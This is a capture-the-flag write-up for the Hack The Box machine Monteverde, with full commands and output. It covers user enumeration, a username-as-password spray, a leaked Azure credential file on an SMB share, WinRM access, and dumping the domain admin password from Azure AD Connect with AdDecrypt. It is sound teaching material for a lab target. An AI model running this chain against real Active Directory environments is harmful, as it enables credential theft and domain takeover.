Monteverde
AD box on HTB.
Enumeration:
Port Scanning:
As always we are going to start with nmap to scan for open ports:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Monteverde]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oN nmap/services.nmap -vv 10.129.228.111
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-06 00:58 EDT
Nmap scan report for 10.129.228.111
Host is up, received echo-reply ttl 127 (0.12s latency).
Scanned at 2025-09-06 00:58:11 EDT for 236s
Not shown: 65517 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-09-06 04:59:10Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
<snipped>
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows
<snipped>
|_clock-skew: 1s
<snipped>So we have another active directory box.
I will add the domain and hostname to the hosts file:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Monteverde]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
<snipped>
10.129.228.111 MONTEVERDE.MEGABANK.LOCAL MEGABANK.LOCAL MONTEVERDEI am going to enumerate shares and users with netexec:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Monteverde]
└─$ netexec smb 10.129.228.111 -u '' -p '' --users
SMB 10.129.228.111 445 MONTEVERDE [*] Windows 10 / Server 2019 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB 10.129.228.111 445 MONTEVERDE [+] MEGABANK.LOCAL\:
SMB 10.129.228.111 445 MONTEVERDE -Username- -Last PW Set- -BadPW- -Description-
SMB 10.129.228.111 445 MONTEVERDE Guest <never> 0 Built-in account for guest access to the computer/domain
SMB 10.129.228.111 445 MONTEVERDE AAD_987d7f2f57d2 2020-01-02 22:53:24 0 Service account for the Synchronization Service with installation identifier 05c97990-7587-4a3d-b312-309adfc172d9 running on computer MONTEVERDE.
SMB 10.129.228.111 445 MONTEVERDE mhope 2020-01-02 23:40:05 0
SMB 10.129.228.111 445 MONTEVERDE SABatchJobs 2020-01-03 12:48:46 0
SMB 10.129.228.111 445 MONTEVERDE svc-ata 2020-01-03 12:58:31 0
SMB 10.129.228.111 445 MONTEVERDE svc-bexec 2020-01-03 12:59:55 0
SMB 10.129.228.111 445 MONTEVERDE svc-netapp 2020-01-03 13:01:42 0
SMB 10.129.228.111 445 MONTEVERDE dgalanos 2020-01-03 13:06:10 0
SMB 10.129.228.111 445 MONTEVERDE roleary 2020-01-03 13:08:05 0
SMB 10.129.228.111 445 MONTEVERDE smorgan 2020-01-03 13:09:21 0
SMB 10.129.228.111 445 MONTEVERDE [*] Enumerated 10 local users: MEGABANKNo I do not have permissions to enumerate shares.
Username as the Password:
Now I will save those users to a file, and attempt multiple attacks on them, for example use the username as the password:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Monteverde]
└─$ netexec smb 10.129.228.111 -u users.txt -p users.txt --no-bruteforce --continue-on-success
SMB 10.129.228.111 445 MONTEVERDE [*] Windows 10 / Server 2019 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB 10.129.228.111 445 MONTEVERDE [-] MEGABANK.LOCAL\Guest:Guest STATUS_LOGON_FAILURE
SMB 10.129.228.111 445 MONTEVERDE [-] MEGABANK.LOCAL\AAD_987d7f2f57d2:AAD_987d7f2f57d2 STATUS_LOGON_FAILURE
SMB 10.129.228.111 445 MONTEVERDE [-] MEGABANK.LOCAL\mhope:mhope STATUS_LOGON_FAILURE
SMB 10.129.228.111 445 MONTEVERDE [+] MEGABANK.LOCAL\SABatchJobs:SABatchJobs
SMB 10.129.228.111 445 MONTEVERDE [-] MEGABANK.LOCAL\svc-ata:svc-ata STATUS_LOGON_FAILURE
SMB 10.129.228.111 445 MONTEVERDE [-] MEGABANK.LOCAL\svc-bexec:svc-bexec STATUS_LOGON_FAILURE
SMB 10.129.228.111 445 MONTEVERDE [-] MEGABANK.LOCAL\svc-netapp:svc-netapp STATUS_LOGON_FAILURE
SMB 10.129.228.111 445 MONTEVERDE [-] MEGABANK.LOCAL\dgalanos:dgalanos STATUS_LOGON_FAILURE
SMB 10.129.228.111 445 MONTEVERDE [-] MEGABANK.LOCAL\roleary:roleary STATUS_LOGON_FAILURE
SMB 10.129.228.111 445 MONTEVERDE [-] MEGABANK.LOCAL\smorgan:smorgan STATUS_LOGON_FAILURENow we have valid credentials sabatchjobs:SABatchJobs.
I did not find anything useful on BloodHound data.
Lets try now to enumerate the shares:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Monteverde]
└─$ netexec smb 10.129.228.111 -u sabatchjobs -p SABatchJobs --shares
SMB 10.129.228.111 445 MONTEVERDE [*] Windows 10 / Server 2019 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB 10.129.228.111 445 MONTEVERDE [+] MEGABANK.LOCAL\sabatchjobs:SABatchJobs
SMB 10.129.228.111 445 MONTEVERDE [*] Enumerated shares
SMB 10.129.228.111 445 MONTEVERDE Share Permissions Remark
SMB 10.129.228.111 445 MONTEVERDE ----- ----------- ------
SMB 10.129.228.111 445 MONTEVERDE ADMIN$ Remote Admin
SMB 10.129.228.111 445 MONTEVERDE azure_uploads READ
SMB 10.129.228.111 445 MONTEVERDE C$ Default share
SMB 10.129.228.111 445 MONTEVERDE E$ Default share
SMB 10.129.228.111 445 MONTEVERDE IPC$ READ Remote IPC
SMB 10.129.228.111 445 MONTEVERDE NETLOGON READ Logon server share
SMB 10.129.228.111 445 MONTEVERDE SYSVOL READ Logon server share
SMB 10.129.228.111 445 MONTEVERDE users$ READWe have three not default shares: azure_uploads, E$, users$, but we have read access only on azure_uploads, and users$.
Shell as mhope:
I will use smbclient to interact with those shares:
┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Monteverde/smb]
└─$ smbclient //10.129.228.111/azure_uploads -U 'megabank.local/sabatchjobs%SABatchJobs'
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Fri Jan 3 07:43:06 2020
.. D 0 Fri Jan 3 07:43:06 2020
31999 blocks of size 4096. 28979 blocks available
smb: \> exit
┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Monteverde/smb]
└─$ smbclient //10.129.228.111/users$ -U 'megabank.local/sabatchjobs%SABatchJobs'
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Fri Jan 3 08:12:48 2020
.. D 0 Fri Jan 3 08:12:48 2020
dgalanos D 0 Fri Jan 3 08:12:30 2020
mhope D 0 Fri Jan 3 08:41:18 2020
roleary D 0 Fri Jan 3 08:10:30 2020
smorgan D 0 Fri Jan 3 08:10:24 2020
31999 blocks of size 4096. 28979 blocks available
smb: \> prompt off
smb: \> recurse on
smb: \> mget *
getting file \mhope\azure.xml of size 1212 as mhope/azure.xml (1.8 KiloBytes/sec) (average 1.8 KiloBytes/sec)
smb: \> exitWe have azure.xml file into mhope directory.
Lets see what it contains:
┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Monteverde/smb]
└─$ cat mhope/azure.xml
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
<T>System.Object</T>
</TN>
<ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
<Props>
<DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
<DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
<G N="KeyId">00000000-0000-0000-0000-000000000000</G>
<S N="Password">4n0therD4y********</S>
</Props>
</Obj>
</Objs>So we have another password in mhope directory, maybe it is for him, but we can also try to spray it on the users we have enumerated earlier:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Monteverde]
└─$ netexec smb 10.129.228.111 -u users.txt -p passwords.txt --continue-on-success
SMB 10.129.228.111 445 MONTEVERDE [*] Windows 10 / Server 2019 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB 10.129.228.111 445 MONTEVERDE [-] MEGABANK.LOCAL\Guest:4n0therD4y******** STATUS_LOGON_FAILURE
SMB 10.129.228.111 445 MONTEVERDE [-] MEGABANK.LOCAL\AAD_987d7f2f57d2:4n0therD4y******** STATUS_LOGON_FAILURE
SMB 10.129.228.111 445 MONTEVERDE [+] MEGABANK.LOCAL\mhope:4n0therD4y********
SMB 10.129.228.111 445 MONTEVERDE [-] MEGABANK.LOCAL\SABatchJobs:4n0therD4y******** STATUS_LOGON_FAILURE
SMB 10.129.228.111 445 MONTEVERDE [-] MEGABANK.LOCAL\svc-ata:4n0therD4y******** STATUS_LOGON_FAILURE
SMB 10.129.228.111 445 MONTEVERDE [-] MEGABANK.LOCAL\svc-bexec:4n0therD4y******** STATUS_LOGON_FAILURE
SMB 10.129.228.111 445 MONTEVERDE [-] MEGABANK.LOCAL\svc-netapp:4n0therD4y******** STATUS_LOGON_FAILURE
SMB 10.129.228.111 445 MONTEVERDE [-] MEGABANK.LOCAL\dgalanos:4n0therD4y******** STATUS_LOGON_FAILURE
SMB 10.129.228.111 445 MONTEVERDE [-] MEGABANK.LOCAL\roleary:4n0therD4y******** STATUS_LOGON_FAILURE
SMB 10.129.228.111 445 MONTEVERDE [-] MEGABANK.LOCAL\smorgan:4n0therD4y******** STATUS_LOGON_FAILUREIndeed it is for mhope domain user.
We can use netexec to check for other services, and we found previously that WinRM is open, lets try it out:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Monteverde]
└─$ netexec winrm monteverde.megabank.local -u mhope -p '4n0therD4y********'
WINRM 10.129.228.111 5985 MONTEVERDE [*] Windows 10 / Server 2019 Build 17763 (name:MONTEVERDE) (domain:MEGABANK.LOCAL)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 10.129.228.111 5985 MONTEVERDE [+] MEGABANK.LOCAL\mhope:4n0therD4y******** (Pwn3d!)We can see the Pwn3d!, which implies that we can authenticate to the machine since we are member of Remote Management Users.
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Monteverde]
└─$ evil-winrm -i 10.129.228.111 -u mhope -p '4n0therD4y********'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\mhope\Documents>Privilege Escalation:
Lets check our who we are:
*Evil-WinRM* PS C:\Users\mhope\Documents> whoami /all 01:21:52 [173/193]
<snipped>
Group Name Type SID Attributes
=========================================== ================ ============================================ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
MEGABANK\Azure Admins Group S-1-5-21-391775091-850290835-3566037492-2601 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
<snipped>We will see that we are member of Azure Admins, which is odd, also I found there was .Azure folder on mhope directory:
*Evil-WinRM* PS C:\Users\mhope\.Azure> dir
Directory: C:\Users\mhope\.Azure
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 1/3/2020 5:35 AM ErrorRecords
-a---- 1/3/2020 5:31 AM 34 AzurePSDataCollectionProfile.json
-a---- 1/3/2020 5:35 AM 2794 AzureRmContext.json
-a---- 1/3/2020 5:31 AM 191 AzureRmContextSettings.json
-a---- 1/3/2020 5:36 AM 7896 TokenCache.datIf we check for installed applications on that system:
*Evil-WinRM* PS C:\Users\mhope\.Azure> Get-Package | Select-Object Name, Version
Warning: MSG:UnableToDownload «https://go.microsoft.com/fwlink/?LinkID=627338&clcid=0x409» «»
Warning: Unable to download the list of available providers. Check your internet connection.
Name Version
---- -------
GDR 2027 for SQL Server 2017 (KB4505224) (64-bit) 14.0.2027.2
Microsoft SQL Server 2017 (64-bit)
Microsoft Help Viewer 2.3 2.3.28107
Microsoft Help Viewer 2.3 2.3.28107
Microsoft Visual C++ 2017 Redistributable (x86) - 14.12.25810 14.12.25810.0
Microsoft Azure AD Connect Health agent for sync 3.1.7.0
Microsoft Azure AD Connect Health agent for sync 3.1.7.0
Microsoft SQL Server Management Studio - 18.4 15.0.18206.0
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 12.0.21005.1
Microsoft Visual C++ 2017 Redistributable (x64) - 14.12.25810 14.12.25810.0
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0
Microsoft Visual Studio Tools for Applications 2017 15.0.27520
SQL Server 2017 Shared Management Objects Extensions 14.0.1000.169
Microsoft Azure AD Connect 1.1.882.0
SQL Server 2017 Common Files 14.0.1000.169
SQL Server 2017 Batch Parser 14.0.1000.169 [0/193]
Microsoft ODBC Driver 17 for SQL Server 17.4.1.1
Microsoft Azure AD Connect synchronization services 1.1.882.0
Microsoft Analysis Services OLE DB Provider 15.0.2000.20
Microsoft Visual C++ 2017 x86 Additional Runtime - 14.12.25810 14.12.25810
VMware Tools 10.3.2.9925305
Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005
Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 12.0.21005
Microsoft SQL Server 2017 Setup (English) 14.0.2027.2
Microsoft SQL Server 2012 Command Line Utilities 11.4.7001.0
SQL Server 2017 DMF 14.0.1000.169
Microsoft SQL Server 2017 T-SQL Language Service 14.0.1000.169
SQL Server 2017 Shared Management Objects 14.0.1000.169
SQL Server 2017 Database Engine Shared 14.0.1000.169
SQL Server Management Studio 15.0.18206.0
SQL Server 2017 Connection Info 14.0.1000.169
SQL Server 2017 SQL Diagnostics 14.0.1000.169
Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.21005 12.0.21005
Browser for SQL Server 2017 14.0.1000.169
Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.21005 12.0.21005
Microsoft SQL Server 2012 Native Client 11.4.7462.6
Microsoft Visual C++ 2017 x64 Additional Runtime - 14.12.25810 14.12.25810
SSMS Post Install Tasks 15.0.18206.0
SQL Server Management Studio for Reporting Services 15.0.18206.0
Microsoft VSS Writer for SQL Server 2017 14.0.1000.169
Microsoft SQL Server 2017 RsFx Driver 14.0.2027.2
SQL Server 2017 Database Engine Services 14.0.1000.169
Microsoft OLE DB Driver for SQL Server 18.2.3.0
Visual Studio 2017 Isolated Shell for SSMS 15.0.28307.421
Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.12.25810 14.12.25810
Microsoft ODBC Driver 13 for SQL Server 14.0.2027.2
SQL Server 2017 XEvent 14.0.1000.169
Integration Services 15.0.1900.63
Microsoft Visual C++ 2017 x64 Minimum Runtime - 14.12.25810 14.12.25810
Microsoft Visual Studio Tools for Applications 2017 x64 Hosting Support 15.0.27520
SQL Server Management Studio for Analysis Services 15.0.18206.0
Microsoft Visual Studio Tools for Applications 2017 x86 Hosting Support 15.0.27520
Active Directory Authentication Library for SQL Server 15.0.1300.359
Az.Accounts 1.6.6
Az.Resources 1.9.0
*Evil-WinRM* PS C:\Program Files> dir
Directory: C:\Program Files
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 1/2/2020 9:36 PM Common Files
d----- 1/2/2020 2:46 PM internet explorer
d----- 1/2/2020 2:38 PM Microsoft Analysis Services
d----- 1/2/2020 2:51 PM Microsoft Azure Active Directory Connect
d----- 1/2/2020 3:37 PM Microsoft Azure Active Directory Connect Upgrader
d----- 1/2/2020 3:02 PM Microsoft Azure AD Connect Health Sync Agent
d----- 1/2/2020 2:53 PM Microsoft Azure AD Sync
d----- 1/2/2020 2:38 PM Microsoft SQL Server
d----- 1/2/2020 2:25 PM Microsoft Visual Studio 10.0
d----- 1/2/2020 2:32 PM Microsoft.NET
d----- 1/3/2020 5:28 AM PackageManagement
d----- 1/2/2020 9:37 PM VMware
d-r--- 1/2/2020 2:46 PM Windows Defender
d----- 1/2/2020 2:46 PM Windows Defender Advanced Threat Protection
d----- 9/15/2018 12:19 AM Windows Mail
d----- 1/2/2020 2:46 PM Windows Media Player
d----- 9/15/2018 12:19 AM Windows Multimedia Platform
d----- 9/15/2018 12:28 AM windows nt
d----- 1/2/2020 2:46 PM Windows Photo Viewer
d----- 9/15/2018 12:19 AM Windows Portable Devices
d----- 9/15/2018 12:19 AM Windows Security
d----- 1/3/2020 5:28 AM WindowsPowerShellWe will find Microsoft Azure AD Connect which is not installed by default on an active directory machine.
When you play CTF machine and find non-default application installed on that system, it is probably the way to escalate your privileges.
I searched online for how can I abuse this:
And found this medium article stated that we can dump credentials:
He mentioned in the references Vbscrub binary that can dump credentials, lets search for it:
As he stated:
The Azure AD Connect service is essentially responsible for synchronizing things between your local AD domain, and the Azure based domain. However, to do this it needs privileged credentials for your local domain so that it can perform various operations such as syncing passwords etc.
And he provided us with a binary that we can use to abuse this feature:
What this script will do:
It will connect to the mssql database.
It will pull those values instance_id, keyset_id, entropy from mms_server_configuration, because those values will be needed further for decryption.
From mms_management_agent, it will grab private_configuration_xml which contains the username, and encrypted_configuration that contians the encrypted password.
It will try to decrypt the password, and finally print the result to the terminal.
I will download it and unzip it:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Monteverde]
└─$ wget https://github.com/VbScrub/AdSyncDecrypt/releases/download/v1.0/AdDecrypt.zip
--2025-09-06 01:44:25-- https://github.com/VbScrub/AdSyncDecrypt/releases/download/v1.0/AdDecrypt.zip
Resolving github.com (github.com)... 20.233.83.145
Connecting to github.com (github.com)|20.233.83.145|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://release-assets.githubusercontent.com/github-production-release-asset/257912912/7117a000-84a7-11ea-8b7b-d19439d5eb39?sp=r&sv=2018-11-09&sr=b&spr=https&se=2025-09-06T06%3A40%3A58Z&rscd=attachment%3B+filename%3DAdDecrypt.zip&rsct=application%2Foctet-stream&skoid=96c2d410-5711-43a1-aedd-ab1947aa7ab0&sktid=398a6654-997b-47e9-b12b-9515b896b4de&skt=2025-09-06T05%3A40%3A09Z&ske=2025-09-06T06%3A40%3A58Z&sks=b&skv=2018-11-09&sig=gk8Bqj0Sf2f799WNgW9Y%2FhSRfU6rUC0sCRVhuQOBJgk%3D&jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmVsZWFzZS1hc3NldHMuZ2l0aHVidXNlcmNvbnRlbnQuY29tIiwia2V5Ijoia2V5MSIsImV4cCI6MTc1NzEzNzc3NiwibmJmIjoxNzU3MTM3NDc2LCJwYXRoIjoicmVsZWFzZWFzc2V0cHJvZHVjdGlvbi5ibG9iLmNvcmUud2luZG93cy5uZXQifQ.3OdMtpJNqmtTlL-0XMiYwXbDudv4WHWNlHQq0AEuhSM&response-content-disposition=attachment%3B%20filename%3DAdDecrypt.zip&response-content-type=application%2Foctet-stream [following]
--2025-09-06 01:44:36-- https://release-assets.githubusercontent.com/github-production-release-asset/257912912/7117a000-84a7-11ea-8b7b-d19439d5eb39?sp=r&sv=2018-11-09&sr=b&spr=https&se=2025-09-06T06%3A40%3A58Z&rscd=attachment%3B+filename%3DAdDecrypt.zip&rsct=application%2Foctet-stream&skoid=96c2d410-5711-43a1-aedd-ab1947aa7ab0&sktid=398a6654-997b-47e9-b12b-9515b896b4de&skt=2025-09-06T05%3A40%3A09Z&ske=2025-09-06T06%3A40%3A58Z&sks=b&skv=2018-11-09&sig=gk8Bqj0Sf2f799WNgW9Y%2FhSRfU6rUC0sCRVhuQOBJgk%3D&jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmVsZWFzZS1hc3NldHMuZ2l0aHVidXNlcmNvbnRlbnQuY29tIiwia2V5Ijoia2V5MSIsImV4cCI6MTc1NzEzNzc3NiwibmJmIjoxNzU3MTM3NDc2LCJwYXRoIjoicmVsZWFzZWFzc2V0cHJvZHVjdGlvbi5ibG9iLmNvcmUud2luZG93cy5uZXQifQ.3OdMtpJNqmtTlL-0XMiYwXbDudv4WHWNlHQq0AEuhSM&response-content-disposition=attachment%3B%20filename%3DAdDecrypt.zip&response-content-type=application%2Foctet-stream
Resolving release-assets.githubusercontent.com (release-assets.githubusercontent.com)... 185.199.108.133, 185.199.111.133, 185.199.109.133, ...
Connecting to release-assets.githubusercontent.com (release-assets.githubusercontent.com)|185.199.108.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 152818 (149K) [application/octet-stream]
Saving to: ‘AdDecrypt.zip’
AdDecrypt.zip 100%[=======================================================================================>] 149.24K --.-KB/s in 0.1s
2025-09-06 01:44:41 (1.37 MB/s) - ‘AdDecrypt.zip’ saved [152818/152818]
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Monteverde]
└─$ unzip AdDecrypt.zip
Archive: AdDecrypt.zip
inflating: AdDecrypt.exe
inflating: mcrypt.dllAs he mentioned we need to upload both the binary and the dll files to the target machine:
*Evil-WinRM* PS C:\Users\mhope\Downloads> upload AdDecrypt.exe
Info: Uploading /home/kali/Desktop/CTF/Machines/HackTheBox/Monteverde/AdDecrypt.exe to C:\Users\mhope\Downloads\AdDecrypt.exe
Data: 19796 bytes of 19796 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\mhope\Downloads> upload mcrypt.dll
Info: Uploading /home/kali/Desktop/CTF/Machines/HackTheBox/Monteverde/mcrypt.dll to C:\Users\mhope\Downloads\mcrypt.dll
Data: 445664 bytes of 445664 bytes copied
Info: Upload successful!Then from within the Bin directory in Microsoft Azure AD Sync as our path we will run the binary with -FullSQL to use the windows authentication:
*Evil-WinRM* PS C:\Program Files\Microsoft Azure AD Sync\Bin> C:\Users\mhope\Downloads\AdDecrypt.exe -FullSQL
======================
AZURE AD SYNC CREDENTIAL DECRYPTION TOOL
Based on original code from: https://github.com/fox-it/adconnectdump
======================
Opening database connection...
Executing SQL commands...
Closing database connection...
Decrypting XML...
Parsing XML...
Finished!
DECRYPTED CREDENTIALS:
Username: administrator
Password: d0m@in4d********
Domain: MEGABANK.LOCALHere we have the domain admin password.
We can use psexec or evil-winrm to authenticate as the administrator:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Monteverde]
└─$ evil-winrm -i 10.129.228.111 -u administrator -p 'd0m@in4d********'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
megabank\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> hostname
MONTEVERDE
*Evil-WinRM* PS C:\Users\Administrator\Documents> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::f433:f605:ad5e:6417
Link-local IPv6 Address . . . . . : fe80::f433:f605:ad5e:6417%7
IPv4 Address. . . . . . . . . . . : 10.129.228.111
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:f8ec%7
10.129.0.1And we can read the flags:
*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\Administrator\Desktop\root.txt
c9b74e25a48019a5****************
*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\mhope\Desktop\user.txt
ea69e095a08222ec****************Last updated